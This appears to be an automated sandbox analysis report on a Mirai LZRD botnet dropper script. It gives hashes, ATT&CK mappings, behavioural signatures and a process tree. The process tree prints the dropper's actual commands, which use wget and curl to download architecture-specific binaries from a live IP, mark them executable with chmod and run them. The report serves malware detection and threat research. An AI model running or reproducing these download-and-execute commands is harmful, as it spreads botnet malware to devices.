mirai | cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea

Analysis

max time kernel
149s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22/12/2024, 12:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.sh
Size

2KB
MD5

8364b34731a2e12ce67c2cfcb2811e75
SHA1

5d718457dfa0ecc1a46528696d2769d11adf018f
SHA256

cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea
SHA512

ca94f2b3643f6047efc405c15eab8fce850602cb28dbf36d760e7b6010df32c202066ab2ef66a79e0437792d8b5babc6f7a5742f7cb26df6e6354b55e1c837f9

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 6 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1491	chmod
1497	chmod
1514	chmod
1524	chmod
1534	chmod
1544	chmod

Executes dropped EXE 6 IoCs

ioc	pid	Process
/tmp/Space	1492	Space
/tmp/Space	1498	Space
/tmp/Space	1515	Space
/tmp/Space	1525	Space
/tmp/Space	1535	Space
/tmp/Space	1545	Space

Modifies Watchdog functionality 1 TTPs 10 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 10 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-5.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1279/status	Space
File opened for reading	/proc/1164/status	Space
File opened for reading	/proc/709/status	Space
File opened for reading	/proc/8/status	Space
File opened for reading	/proc/30/status	Space
File opened for reading	/proc/154/status	Space
File opened for reading	/proc/664/status	Space
File opened for reading	/proc/1004/status	Space
File opened for reading	/proc/80/status	Space
File opened for reading	/proc/1286/status	Space
File opened for reading	/proc/36/status	Space
File opened for reading	/proc/1337/status	Space
File opened for reading	/proc/159/status	Space
File opened for reading	/proc/1099/status	Space
File opened for reading	/proc/1472/status	Space
File opened for reading	/proc/23/status	Space
File opened for reading	/proc/82/status	Space
File opened for reading	/proc/1258/status	Space
File opened for reading	/proc/451/status	Space
File opened for reading	/proc/517/status	Space
File opened for reading	/proc/29/status	Space
File opened for reading	/proc/1520/status	Space
File opened for reading	/proc/400/status	Space
File opened for reading	/proc/1286/status	Space
File opened for reading	/proc/83/status	Space
File opened for reading	/proc/129/status	Space
File opened for reading	/proc/1167/status	Space
File opened for reading	/proc/84/status	Space
File opened for reading	/proc/18/status	Space
File opened for reading	/proc/1326/status	Space
File opened for reading	/proc/468/status	Space
File opened for reading	/proc/960/status	Space
File opened for reading	/proc/1279/status	Space
File opened for reading	/proc/1089/status	Space
File opened for reading	/proc/8/status	Space
File opened for reading	/proc/1108/status	Space
File opened for reading	/proc/517/status	Space
File opened for reading	/proc/1472/status	Space
File opened for reading	/proc/20/status	Space
File opened for reading	/proc/21/status	Space
File opened for reading	/proc/701/status	Space
File opened for reading	/proc/158/status	Space
File opened for reading	/proc/10/status	Space
File opened for reading	/proc/947/status	Space
File opened for reading	/proc/1312/status	Space
File opened for reading	/proc/949/status	Space
File opened for reading	/proc/20/status	Space
File opened for reading	/proc/1326/status	Space
File opened for reading	/proc/163/status	Space
File opened for reading	/proc/169/status	Space
File opened for reading	/proc/1057/status	Space
File opened for reading	/proc/633/status	Space
File opened for reading	/proc/444/status	Space
File opened for reading	/proc/1062/status	Space
File opened for reading	/proc/1232/status	Space
File opened for reading	/proc/34/status	Space
File opened for reading	/proc/1538/status	Space
File opened for reading	/proc/1278/status	Space
File opened for reading	/proc/431/status	Space
File opened for reading	/proc/36/status	Space
File opened for reading	/proc/1538/status	Space
File opened for reading	/proc/624/status	Space
File opened for reading	/proc/79/status	Space
File opened for reading	/proc/158/status	Space

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1531	wget
1532	curl
1541	wget
1542	curl

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Space.x86	curl
File opened for modification	/tmp/Space.x86_64	wget
File opened for modification	/tmp/Space.mips	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Space.arc	wget
File opened for modification	/tmp/Space	1.sh
File opened for modification	/tmp/Space.x86	wget
File opened for modification	/tmp/Space.mips	wget
File opened for modification	/tmp/Space.mips64	curl
File opened for modification	/tmp/Space.arc	curl
File opened for modification	/tmp/Space.x86_64	curl
File opened for modification	/tmp/Space.i686	wget
File opened for modification	/tmp/Space.i686	curl

/tmp/1.sh
/tmp/1.sh
1⤵
- Writes file to tmp directory
PID:1475
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1476
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:1477
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:1489
- /bin/cat
  cat Space.arc
  2⤵
  PID:1490
- /bin/chmod
  chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
  2⤵
  - File and Directory Permissions Modification
  PID:1491
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:1492
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:1494
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:1495
- /bin/cat
  cat Space.x86
  2⤵
  PID:1496
- /bin/chmod
  chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
  2⤵
  - File and Directory Permissions Modification
  PID:1497
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1498
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1511
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/chmod
  chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1515
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:1521
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/chmod
  chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1525
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1531
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1532
- /bin/chmod
  chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1535
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1541
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1542
- /bin/chmod
  chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1545
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.mpsl
  2⤵
  PID:1551

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Space

Filesize
37KB

MD5
b73e8fbb7aee4bbe5902554d6ab22092

SHA1
620097bfd55d8ade8d138bb2ba10e8d4c43fd105

SHA256
22dfde185b0b8051baf38817b34383b65d9dbe7ef4f09ad9cd856154c0709d04

SHA512
d42eed1c1ac183241f787c967d627e3df379c13c2b992c83c3cd9cdd5ee1446e8898709ad1472ba31a36aab9cbdc04b9c0a7c36668e39c8d26d5b808bb4ea9d8

Download Submit
/tmp/Space.arc

Filesize
113KB

MD5
0fdd3e751fa9d0f60c5a218e4269c9ad

SHA1
0d9ae7d06494f59cfc3bfba8e162e29630159be3

SHA256
81749b59ba614b200a57dd0990104117748a04add1ce6f28528328fb50e19528

SHA512
2b9ab36b3f5fd535ff322c4ac3fcad543b3d6da8fdbad80c6dfad309bf33e340ed9871453f7614d3a35395e7afd23066d7c766fb7b4466ccf591e570300ae0de

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads